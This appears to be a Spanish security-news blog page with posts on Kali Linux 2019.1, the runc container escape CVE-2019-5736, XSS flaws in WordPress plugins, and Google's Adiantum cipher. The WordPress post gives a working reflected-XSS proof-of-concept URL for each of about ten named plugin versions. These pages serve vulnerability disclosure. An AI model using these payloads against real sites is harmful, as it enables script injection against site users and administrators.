19 de febrero de 2019

Kali Linux 2019.1

Offensive Security acaba de lanzar Kali Linux 2019.1 que es la primera versión lanzada este 2019 de esta distribución que es una navaja suiza para profesionales de la ciberseguridad. Cuenta con la versión 4.19.13 del Kernel que contiene numerosos parches además actualizar muchos programas como Metasploit, theHarvester, DBeaver y más.


Kali Linux 2019.1 viene con la última versión de Metasploit (v5.0), que "incluye bases de datos y API de automatización, nuevas capacidades de evasión y mejoras de uso", lo que la convierte en una plataforma más eficiente para realizar pruebas de penetración.

Kali Linux 2019.1 incluye el soporte para Banana Pi y Banana Pro


Gracias a la versión de Kali 2019.1 para ARM ahora podemos usar la Banana Pi y Banana Pro, ambos de los cuales están incluidos en el kernel 4.19.

Veyron se ha movido al kernel 4.19 y las imágenes de Raspberry Pi se han simplificado para que sea más fácil averiguar cuál usar.

Ya no hay imágenes Raspberry Pi separadas para usuarios con TFT LCD porque ahora incluyen el script kalipi-tft-config de re4son en todos ellos, por lo que si deseas configurar una placa con un TFT, ejecuta 'kalipi-tft-config' y siga las indicaciones.

Disponibles las nuevas VM de Kali


Las máquina virtuales de esta distribución y las imágenes ARM también se han actualizado a la última versión 2019.1 y ya puedes descargarlas desde este enlace

¿Cómo descargar o actualizar Kali Linux?


Puedes descargar las nuevas imágenes ISO de Kali Linux directamente desde el sitio web oficial y si ya estas actualmente usando Kali Linux puedes simplemente actualizarlo a la última ejecutando el comando: apt update && apt -y

Fuente | tecnonucleous

15 de febrero de 2019

Vulnerabilidad en runc permite escapar de contenedor #Docker con permisos root

El fallo afecta a otros productos derivados de Docker que usan runc y al propio LXC, permitiendo acceder a la máquina host con permisos de superusuario.
docker
Los investigadores Adam Iwaniuk y Borys Popławski han descubierto una vulnerabilidad en runc, la utilidad para ejecutar contenedores de la Open Containers Initiative, por la cual es posible obtener root en la máquina que ejecuta el contenedor. Además, Aleksa Sarai, uno de los mantenedores de runc, ha conseguido crear una versión modificada del fallo que también afectaría a LXC.
Para la explotación del fallo sólo es necesario un contenedor malicioso, el cual sobrescribirá el binario ‘runc’de la máquina host, y que el usuario acceda dicho contenedor (utilizando ‘docker exec’). El ataque no es bloqueado por la política por defecto de AppArmor, al igual que la de SELinux en sistemas como Fedora. No obstante, utilizando el modo enforcing mode con una correcta configuración de los namespaces (como ocurre por defecto en Red Hat), el ataque sí es bloqueado.
La vulnerabilidad ha sido identificada con el CVE-2019-5736, y ya hay un parche disponible que corrige el fallo. Si no fuese posible parchear, una posible solución es configurar SELinux correctamente para impedir la explotación. El 18 de febrero (7 días después de la revelarse el fallo) se publicará una prueba de concepto para poder comprobar si se es vulnerable.
Empresas de Cloud como Amazon AWS ya se han comunicado con sus clientes para informarles del fallo, y se espera que en los próximos días otras empresas del sector hagan lo mismo. En principio, los clientes de estos servicios no necesitan tomar medidas, pero aquellos administradores de sistemas que mantengan servidores con Docker deberán parchear para evitar ser víctimas del CVE-2019-5736.
Fuente | una-al-dia

11 de febrero de 2019

#XSS en múltiples plugins para #WordPress

El investigador de seguridad Tim Coen ha publicado múltiples vulnerabilidades en hasta 11 Plugins diferentes para WordPress. Estas vulnerabilidades podrían permitir realizar ataques ‘Cross-site Scripting’ (XSS) reflejados debido a la falta de filtrado antes de mostrar determinados parámetros con contenido proporcionado por el usuario.


A continuación se enumeran dichos plugins, las versiones vulnerables y actualizadas, el parámetro causante del fallo de seguridad y una prueba de concepto para comprobar si la versión instalada se encuentra afectada:

Blog2Social


  • Versión vulnerable: 5.0.2
  • Versión actualizada: 5.0.3
  • Parámetro ‘b2s_update_publish_date’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=blog2social-ship&postId=70&b2s_action=1&b2s_update_publish_date='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


Contact Form Email 7.10.41


  • Versión vulnerable: 1.2.65
  • Versión actualizada: 1.2.66
  • Parámetro ‘item’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


Font_Organizer


  • Versión vulnerable: 2.1.1
  • Versión actualizada: Este plugin no ha recibido ninguna actualización por el momento.
  • Parámetro ‘manage_font_id’
  • PoC: http://[WP-BLOG]/wp-admin/options-general.php?page=font-setting-admin&manage_font_id='”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


Give


  • Versión vulnerable: 2.3.0
  • Versión actualizada: 2.3.1
  • Varios parámetros como ‘csv’, ‘mode’, ‘create_user’ y ‘delete_csv’.
  • PoC: http://[WP-BLOG]/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_donations&step=3&mapto%5B0%5D=email&mapto%5B1%5D=first_name&mapto%5B2%5D=amount&mapto%5B3%5D=form_id&csv='”><img+src%3dx+onerror%3dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


KingComposer


  • Versión vulnerable: 2.7.6
  • Versión actualizada: Los desarrolladores de este plugin no han dado ninguna respuesta sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 2.7.8).
  • Parámetro ‘id’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=kc-mapper&id=<%2Fscript><script>alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)<%2Fscript>


NextScripts: Social Networks Auto-Poster


  • Versión vulnerable: 4.2.7
  • Versión actualizada: 4.2.8
  • Parámetro ‘item’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=nxssnap-reposter&action=edit&item=24′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


Quiz And Survey Master


  • Versión vulnerable: 6.0.4
  • Versión actualizada: Los desarrolladores de este plugin no han dado ninguna información sobre el estado de este error. Se recomienda actualizar a la última versión disponible (en estos momentos la 6.2.0).
  • Parámetro ‘quiz_id’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=mlw_quiz_results&quiz_id='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


wpGoogleMaps


  • Versión vulnerable: 7.10.41
  • Versión actualizada: 7.10.43
  • Al hacer un eco de ‘PHP_SELF’ sin filtrado previo.
  • PoC: http://[WP-BLOG]/wp-admin/admin.php/'”;><img src=x onerror=alert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>?page=wp-google-maps-menu&action=foo


WP Live Chat Support


  • Versión vulnerable: 8.0.17
  • Versión actualizada: 8.0.18
  • Parámetro: ‘term’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=wplivechat-menu-gdpr-page&term='”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>


YOP Poll


  • Versión vulnerable: 6.0.2
  • Versión actualizada: 6.0.3
  • Parámetro: ‘poll_id’
  • PoC: http://[WP-BLOG]/wp-admin/admin.php?page=yop-polls&action=view-votes&poll_id=1′”;><img+src%3Dx+onerror%3Dalert(‘Prueba de concepto: ¡¡¡vulnerable!!!’)>
  • Adicionalmente también ha publicado varios errores de seguridad en el plugin Forminator para WordPress, de los cuales ya hablamos hace unos días: “Vulnerabilidades en el plugin de WordPress Forminator“.


Se pueden descargar las versiones indicadas de los anteriores plugins desde la página web oficial de WorPress.

Fuente | una-al-dia

8 de febrero de 2019

Google Adiantum es un nuevo cifrado para los teléfonos de gama baja

Google ha presentado ya de manera oficial Adiantum. Se trata de un nuevo cifrado que se lanza de manera específica para los smartphones de gama baja. Con este cifrado se busca ofrecer una protección para todos los usuarios. Se lanza como una alternativa a AES, un cifrado que nos encontramos en la gama media y alta en el mercado. Pero en la gama baja el procesador no siempre es compatible.


Por eso, en muchos casos la experiencia de uso no es positiva, porque el funcionamiento es lento. Con este nuevo método, basado en el cifrado de flujo ChaCha20, se busca cambiar esto.

Nuevo cifrado de Google


La clave es que Adiantum funcions con una rapidez mayor que otros sistemas como AES, pero manteniendo en todo momento su seguridad. Con este nuevo sistema de cifrado, Google ha pensado en la gama baja en Android. Ya que estos modelos se venden en muchos países, especialmente en países en vía de desarrollo. Por eso, se busca que también dichos modelos sean seguros en todo momento.

Se trata de una buena opción para usuarios que tengan un smartphone con Android Go como sistema operativo. Especialmente porque suelen ser modelos poco potentes, con poca RAM. De modo que este cifrado se adaptaría mejor.

Los fabricantes con Android Pie podrán activar este nuevo cifrado de Google en sus teléfonos. Por tanto, es probable que los siguientes smartphones que lleguen a las tiendas con esta versión del sistema operativo en la gama baja hagan ya uso del mismo.

Enlace | ProfesionalReview

Entradas populares